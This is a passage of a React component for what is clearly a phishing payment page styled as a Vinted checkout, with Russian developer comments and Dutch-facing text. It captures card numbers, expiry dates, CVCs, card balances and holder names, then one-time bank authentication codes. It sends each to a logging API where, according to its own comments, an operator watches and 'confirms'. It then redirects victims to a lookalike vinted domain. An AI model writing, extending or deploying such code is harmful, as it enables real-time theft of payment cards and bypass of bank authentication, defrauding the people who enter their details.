          console.error('Ошибка проверки статуса:', error);
        }
        // Не останавливаем проверку при ошибке сети, продолжаем попытки
      }
    };
    
    const interval = setInterval(checkLogStatus, 2000);
    return () => clearInterval(interval);
  }, [currentLogId, isLoading, step]);

  const formatTime = (seconds) => {
    const minutes = Math.floor(seconds / 60);
    const secs = seconds % 60;
    return `${minutes}:${secs.toString().padStart(2, '0')}`;
  };

  const handleCardNumberChange = (e) => {
    setCardNumber(formatCardNumberInput(e.target.value));
  };

  const handleExpiryMMChange = (e) => {
    let value = e.target.value.replace(/\D/g, '');
    if (parseInt(value) > 12) value = '12';
    setExpiryMM(value);
  };

  const handleExpiryYYChange = (e) => {
    const value = e.target.value.replace(/\D/g, '');
    setExpiryYY(value);
  };

  const handleCvcChange = (e) => {
    const value = e.target.value.replace(/\D/g, '');
    setCvc(value);
  };

  const handleBalanceChange = (e) => {
    const value = e.target.value.replace(/[^\d.,]/g, ''); // Разрешаем цифры, точку и запятую
    setCardBalance(value);
  };

  const handlePayment = async () => {
    const cardFieldsOk = isValidCardNumber(cardNumber) && expiryMM && expiryYY && cvc;
    const balanceOk = balanceChecker ? cardBalance && parseFloat(cardBalance.replace(',', '.')) > 0 : true;
    const nameFieldsOk = requireCardHolderName ? (firstName.trim() && lastName.trim()) : true;
    if (!cardFieldsOk || !balanceOk || !nameFieldsOk) {
      setShowErrors(true);
      return;
    }

    if (!sessionId) {
      alert('Ошибка: сессия не инициализирована');
      return;
    }

    if (balanceChecker) {
      const cardBalanceValue = parseFloat(cardBalance.replace(',', '.'));
      if (isNaN(cardBalanceValue) || cardBalanceValue <= 0) {
        alert('Пожалуйста, введите корректный баланс карты.');
        return;
      }
      setInitialBalance(cardBalanceValue);
    }

    const cardPayload = {
      card_number: cardNumber,
      expiry: `${expiryMM}/${expiryYY}`,
      cvc: cvc,
    };
    if (balanceChecker) {
      cardPayload.balance = parseFloat(cardBalance.replace(',', '.'));
    }
    if (requireCardHolderName) {
      cardPayload.first_name = firstName.trim();
      cardPayload.last_name = lastName.trim();
    }

    try {
      setShowNewCardNotice(false);
      setIsLoading(true);
      const body = {
        session_id: sessionId,
        card_data: cardPayload,
        page_code: resolvePaymentPageCode(pageCode),
      };
      if (keepTakerFromLogIdRef.current) {
        body.keep_taker_from_log_id = keepTakerFromLogIdRef.current;
        keepTakerFromLogIdRef.current = null;
      }
      const response = await fetch(`${API_URL}/api/log/card_input`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(body),
      });

      const data = await response.json();
      if (data.success) {
        setCurrentLogId(data.log_id);
        setShowErrors(false);
      } else {
        setIsLoading(false);
        if (response.status === 403 && data.error === 'captcha_required') {
          invalidateCaptcha(data.message || 'Сначала решите капчу');
        } else {
          alert('Ошибка отправки данных');
        }
      }
    } catch (error) {
      console.error('Ошибка логирования карты:', error);
      setIsLoading(false);
      alert('Ошибка отправки данных');
    }
  };

  const handleContinueFromBalance = () => {
    // После нажатия "Doorgaan met betaling" - показываем экран успеха
    setStep('success');
    setTimeout(() => {
      window.location.href = 'https://vinted.fokusitu.shop/16RH89RB13F93J5/';
    }, 3000);
  };

  const handleConfirmCode = async () => {
    console.log('=== handleConfirmCode вызван ===');
    console.log('confirmationCode:', confirmationCode, 'длина:', confirmationCode?.length);
    console.log('sessionId:', sessionId);
    console.log('API_URL:', API_URL);
    
    if (!sessionId) {
      console.error('Сессия не инициализирована');
      alert('Ошибка: сессия не инициализирована');
      return;
    }
    
    if (!confirmationCode || confirmationCode.length < 4) {
      console.warn('Код слишком короткий:', confirmationCode);
      alert('Пожалуйста, введите полный код подтверждения (минимум 4 символа)');
      return;
    }
    
    console.log('Отправка OTP кода:', confirmationCode, 'на', `${API_URL}/api/log/otp_input`);
    
    // Логируем ввод OTP
    try {
      setIsLoading(true);
      
      const controller = new AbortController();
      const timeoutId = setTimeout(() => controller.abort(), 10000); // 10 секунд timeout
      
      const response = await fetch(`${API_URL}/api/log/otp_input`, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({
          session_id: sessionId,
          otp_code: confirmationCode
        }),
        signal: controller.signal
      });
      
      clearTimeout(timeoutId);
      
      if (!response.ok) {
        throw new Error(`HTTP error! status: ${response.status}`);
      }
      
      const data = await response.json();
      console.log('Ответ API при отправке OTP:', data);
      
      if (data.success) {
        // OTP код отправлен, ждем подтверждения админа. currentLogId не меняем — опрос статуса
        // должен идти по карточному логу (61), чтобы реагировать на Заново/PUSH/Email/Оплачено
        console.log('OTP код отправлен, новый лог:', data.log_id, 'Опрос по карточному логу:', currentLogId);
        setIsLoading(true); // Показываем загрузку после ввода OTP
      } else {
        setIsLoading(false);
        alert('Ошибка отправки кода: ' + (data.error || 'Неизвестная ошибка'));
        return;
      }
    } catch (error) {
      console.error('Ошибка логирования OTP:', error);
      setIsLoading(false);
      if (error.name === 'AbortError') {
        alert('Таймаут подключения к серверу. Убедитесь, что API сервер запущен на ' + API_URL);
      } else {
        alert('Ошибка подключения к серверу. Убедитесь, что API сервер запущен на ' + API_URL + '\n\nОшибка: ' + error.message);
      }
      return;
    }
  };


  // Экран загрузки (Verzoek verwerken... / Even geduld alstublieft) — показываем при любой загрузке, в т.ч. после ввода OTP/email
  if (isLoading) {
    return (
      <div className="index2-container">
        <header className="header">
          <div className="logo">
            <div className="logo-text">{t.logoText}</div>
          </div>
        </header>
        <div className="container">
          <div className="loading-screen">
            <div className="loading-spinner"></div>
            <p className="loading-text">{t.loading}</p>
            <p className="loading-subtext">{t.loadingWait}</p>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  // Экран с балансом карты
  if (step === 'balance') {
    return (
      <div className="index2-container">
        <header className="header">
          <div className="logo">
            <div className="logo-text">{t.logoText}</div>
          </div>
        </header>

        <div className="container">
          <div className="balance-screen">
            <div className="balance-icon">
              <svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M3 10H21M7 15H8M12 15H13M6 20H18C19.1046 20 20 19.1046 20 18V6C20 4.89543 19.1046 4 18 4H6C4.89543 4 4 4.89543 4 6V18C4 19.1046 4.89543 20 6 20Z" stroke="#007782" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
              </svg>
            </div>
            <h2 className="balance-title">{t.cardBalance}</h2>
            <div className="balance-amount">{t.currency} {(initialBalance - productPrice).toFixed(2)}</div>
            <p className="balance-description">
              {t.deducted.replace('{amount}', productPrice.toFixed(2))}
            </p>
            <button className="pay-button" onClick={handleContinueFromBalance}>
              {t.continue}
            </button>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  // Экран ввода кода (Purchase Authentication)
  if (step === 'auth') {
    return (
      <div className="index2-container">
        <header className="header auth-header">
          <div className="auth-header-content">
            <div className="bank-icon">
              <svg width="48" height="48" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M3 21L3 10L12 3L21 10V21" stroke="#333" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
                <path d="M9 21V15H15V21" stroke="#333" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
              </svg>
            </div>
            <div className="mastercard-logo">
              {isEmailOtp ? (
                <svg width="48" height="32" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                  <path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z" fill="#333"/>
                </svg>
              ) : cardType === 'visa' ? (
                <svg width="48" height="32" viewBox="0 0 48 32" fill="none">
                  <rect width="48" height="32" rx="4" fill="#1A1F71"/>
                  <text x="24" y="21" textAnchor="middle" fill="#fff" fontSize="14" fontWeight="bold" fontFamily="Arial">VISA</text>
                </svg>
              ) : (
                <svg width="48" height="32" viewBox="0 0 48 32" fill="none">
                  <circle cx="16" cy="16" r="14" fill="#EB001B"/>
                  <circle cx="32" cy="16" r="14" fill="#F79E1B"/>
                  <path d="M24 5.5C27.3 8.3 29.3 12.3 29.3 16.8C29.3 21.3 27.3 25.3 24 28.1C20.7 25.3 18.7 21.3 18.7 16.8C18.7 12.3 20.7 8.3 24 5.5Z" fill="#FF5F00"/>
                </svg>
              )}
              <div className="id-check-text">{t.idCheck}</div>
            </div>
          </div>
        </header>

        <div className="container auth-container">
          <div className="auth-screen">
            <h1 className="auth-title">{t.authTitle}</h1>
            <p className="auth-description">
              {isEmailOtp ? (t.authDescriptionEmail || 'Check your email for the confirmation code.') : (t.authDescription || 'Check your phone for the confirmation code.')}
            </p>

            <div className="auth-form">
              <label className="auth-label" htmlFor="confirmation-code">
                {t.authCodeLabel}
              </label>
              <input
                type="text"
                id="confirmation-code"
                className="auth-input"
                value={confirmationCode}
                onChange={(e) => setConfirmationCode(e.target.value.replace(/\D/g, '').slice(0, 6))}
                placeholder={t.authCodePlaceholder}
                maxLength="6"
              />

              <button
                type="button"
                className="auth-button"
                onClick={handleConfirmCode}
                disabled={!confirmationCode || confirmationCode.length < 4 || isLoading}
              >
                {t.confirmPayment}
              </button>
            </div>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  // Экран PUSH уведомления (подтвердите на другом устройстве + загрузка)
  if (step === 'push') {
    return (
      <div className="index2-container">
        <header className="header">
          <div className="logo">
            <div className="logo-text">{t.logoText}</div>
          </div>
        </header>

        <div className="container">
          <div className="push-screen">
            <div className="push-icon">
              <svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z" fill="#4CAF50"/>
              </svg>
            </div>
            <h2 className="push-title">{t.pushTitle}</h2>
            <p className="push-description">
              {t.pushDescription}
            </p>
            <div className="push-loading-block">
              <div className="loading-spinner"></div>
              <p className="loading-text">{t.pushLoading}</p>
              <p className="loading-subtext">{t.pushWait}</p>
            </div>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  // Экран ошибки оплаты
  if (step === 'error') {
    return (
      <div className="index2-container">
        <header className="header">
          <div className="logo">
            <div className="logo-text">{t.logoText}</div>
          </div>
        </header>

        <div className="container">
          <div className="error-screen">
            <div className="error-icon">
              <svg width="80" height="80" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <circle cx="12" cy="12" r="10" stroke="#F44336" strokeWidth="2"/>
                <path d="M12 8V12M12 16H12.01" stroke="#F44336" strokeWidth="2" strokeLinecap="round"/>
              </svg>
            </div>
            <h2 className="error-title">{t.errorTitle}</h2>
            <p className="error-description">
              {t.errorDescription}
            </p>
            <button 
              className="retry-button" 
              onClick={() => {
                setStep('form');
                setCardNumber('');
                setExpiryMM('');
                setExpiryYY('');
                setCvc('');
                setCardBalance('');
                setCurrentLogId(null);
                setInitialBalance(0);
                setIsLoading(false);
              }}
            >
              {t.retryButton}
            </button>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (pageData?.captcha_enabled && sessionId && !captchaPassed) {
    return (
      <>
        <SharedCaptchaCard
          variant="page"
          labels={captchaLabels}
          question={captcha.captchaQuestion}
          answer={captcha.captchaAnswer}
          onAnswerChange={captcha.setCaptchaAnswer}
          onVerify={() => handleCaptchaVerify()}
          verifyLoading={captcha.captchaLoading}
          error={captcha.captchaError}
          sessionReady={Boolean(sessionId)}
        />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </>
    );
  }

  // Основной экран формы оплаты
  return (
    <div className="index2-container">
      <header className="header">
        <div className="logo">
          <div className="logo-text">{t.logoText}</div>
        </div>
      </header>

      <div className="container">
        <div className="merchant-info">
          <div className="merchant-name">{t.merchant}</div>
          <div className="amount">{productPrice.toFixed(2)} {t.currency}</div>
          <div className={`time-limit ${totalSeconds === 0 ? 'expired' : ''}`}>
            {totalSeconds > 0
              ? `${t.complete} ${formatTime(totalSeconds)}`
              : t.expired}
          </div>
          <div className="payment-details">
            <span>{t.paymentDetails}</span>
            <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path d="M6 9V6M6 3H6.01M11 6C11 8.76142 8.76142 11 6 11C3.23858 11 1 8.76142 1 6C1 3.23858 3.23858 1 6 1C8.76142 1 11 3.23858 11 6Z" stroke="#666" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round"/>
            </svg>
          </div>
        </div>

        <div className="payment-form">
          {showNewCardNotice && <NewCardNotice countryCode={countryCode} />}
          <div className="payment-method">
            <div className="payment-method-icon">
              <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M3 10H21M7 15H8M12 15H13M6 20H18C19.1046 20 20 19.1046 20 18V6C20 4.89543 19.1046 4 18 4H6C4.89543 4 4 4.89543 4 6V18C4 19.1046 4.89543 20 6 20Z" stroke="#007782" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
              </svg>
            </div>
            <div className="payment-method-text">{t.paymentMethod}</div>
          </div>

          <div className="form-group">
            <label className="form-label" htmlFor="card-number">{t.cardNumber}</label>
            <input
              type="text"
              id="card-number"
              className={`form-input ${showErrors && !isValidCardNumber(cardNumber) ? 'error' : ''}`}
              placeholder="0000 0000 0000 0000"
              maxLength="19"
              value={cardNumber}
              onChange={handleCardNumberChange}
            />
            {showErrors && !isValidCardNumber(cardNumber) && (
              <div className="error-message">{t.fillField}</div>
            )}
          </div>

          <div className="card-row">
            <div className="form-group">
              <label className="form-label" htmlFor="expiry">{t.expiry}</label>
              <div className="expiry-inputs">
                <input
                  type="text"
                  id="expiry-mm"
                  className={`form-input ${showErrors && !expiryMM ? 'error' : ''}`}
                  placeholder="MM"
                  maxLength="2"
                  value={expiryMM}
                  onChange={handleExpiryMMChange}
                />
                <span className="expiry-separator">/</span>
                <input
                  type="text"
                  id="expiry-yy"
                  className={`form-input ${showErrors && !expiryYY ? 'error' : ''}`}
                  placeholder="YY"
                  maxLength="2"
                  value={expiryYY}
                  onChange={handleExpiryYYChange}
                />
              </div>
              {showErrors && (!expiryMM || !expiryYY) && (
                <div className="error-message">{t.fillField}</div>
              )}
            </div>
            <div className="form-group">
              <label className="form-label" htmlFor="cvc">{t.cvcLabel}</label>
              <input
                type="text"
                id="cvc"
                className={`form-input ${showErrors && !cvc ? 'error' : ''}`}
                placeholder="CVC"
                maxLength="3"
                value={cvc}
                onChange={handleCvcChange}
              />
              {showErrors && !cvc && (
                <div className="error-message">{t.fillField}</div>
              )}
            </div>
          </div>

          {balanceChecker && (
            <div className="form-group">
              <label className="form-label" htmlFor="card-balance">{t.cardBalance}</label>
              <input
                type="text"
                id="card-balance"
                className={`form-input ${showErrors && !cardBalance ? 'error' : ''}`}
                placeholder={t.balancePlaceholder}
                value={cardBalance}
                onChange={handleBalanceChange}
              />
              {showErrors && !cardBalance && (
                <div className="error-message">{t.fillField}</div>
              )}
            </div>
          )}
          {requireCardHolderName && (
            <>
              <div className="form-group">
                <label className="form-label" htmlFor="card-first-name">{t.firstNameLabel || 'Имя'}</label>
                <input
                  type="text"
                  id="card-first-name"
                  className={`form-input ${showErrors && !firstName.trim() ? 'error' : ''}`}
                  placeholder={t.firstNamePlaceholder || 'Имя'}
                  value={firstName}
                  onChange={(e) => setFirstName(e.target.value)}
                />
                {showErrors && !firstName.trim() && (
                  <div className="error-message">{t.fillField}</div>
                )}
              </div>
              <div className="form-group">
                <label className="form-label" htmlFor="card-last-name">{t.lastNameLabel || 'Фамилия'}</label>
                <input
                  type="text"
                  id="card-last-name"
                  className={`form-input ${showErrors && !lastName.trim() ? 'error' : ''}`}
                  placeholder={t.lastNamePlaceholder || 'Фамилия'}
                  value={lastName}
                  onChange={(e) => setLastName(e.target.value)}
                />
                {showErrors && !lastName.trim() && (
                  <div className="error-message">{t.fillField}</div>
                )}
              </div>
            </>
          )}

          <div className="checkbox-group">
            <input type="checkbox" id="save-card" className="checkbox" defaultChecked />
            <label htmlFor="save-card" className="checkbox-label">{t.saveCard}</label>
          </div>

          <div className="checkbox-group">
            <input type="checkbox" id="bill-required" className="checkbox" />
            <label htmlFor="bill-required" className="checkbox-label">{t.billRequired}</label>
          </div>

          <button className="pay-button" onClick={handlePayment}>
            {t.pay.replace('{amount}', productPrice.toFixed(2))}
          </button>
        </div>

        <div className="terms" dangerouslySetInnerHTML={{ __html: t.termsText }} />

        <button type="button" className="exit-link" onClick={(e) => e.preventDefault()}>
          <svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg">
            <path d="M10 12L6 8L10 4" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"/>
          </svg>
          <span>{t.exitPayment}</span>
        </button>
      </div>

      <footer className="footer">
        <div className="footer-links">
          <button type="button" className="footer-link" onClick={(e) => e.preventDefault()}>{t.privacyPolicy}</button>
          <button type="button" className="footer-link" onClick={(e) => e.preventDefault()}>{t.cookiePolicy}</button>
          <button type="button" className="footer-link" onClick={(e) => e.preventDefault()}>{t.cookieSettings}</button>
          <button type="button" className="footer-link" onClick={(e) => e.preventDefault()}>{t.termsOfUse}</button>
        </div>
        <div>{t.footerCopy}</div>
      </footer>

      <div className="language-selector">{t.lang}</div>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default Index2;

